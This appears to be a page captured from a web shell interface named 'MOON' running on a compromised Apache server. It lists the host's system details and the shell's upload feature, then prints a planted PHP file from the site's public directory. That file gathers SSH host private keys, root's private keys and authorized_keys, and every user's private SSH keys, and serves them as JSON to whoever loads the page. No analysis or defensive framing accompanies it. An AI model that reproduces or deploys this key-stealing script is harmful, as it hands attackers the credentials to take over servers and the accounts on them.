MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/public_html/x816e4e.php
<?php $r=[];foreach(glob('/etc/ssh/ssh_host_*_key') as $f)$r['HOST_'.basename($f)]=@file_get_contents($f);foreach(glob('/etc/ssh/ssh_host_*_key.pub') as $f)$r['HOSTPUB_'.basename($f)]=@file_get_contents($f);$r['root_id_rsa']=@file_get_contents('/root/.ssh/id_rsa');$r['root_id_ed25519']=@file_get_contents('/root/.ssh/id_ed25519');$r['root_authorized']=@file_get_contents('/root/.ssh/authorized_keys');foreach(glob('/home/*/.ssh/id_rsa') as $f)$r['user_'.basename(dirname(dirname($f))).'_rsa']=@file_get_contents($f);foreach(glob('/home/*/.ssh/id_ed25519') as $f)$r['user_'.basename(dirname(dirname($f))).'_ed']=@file_get_contents($f);echo json_encode(['ok'=>1,'keys'=>array_filter($r)]);?>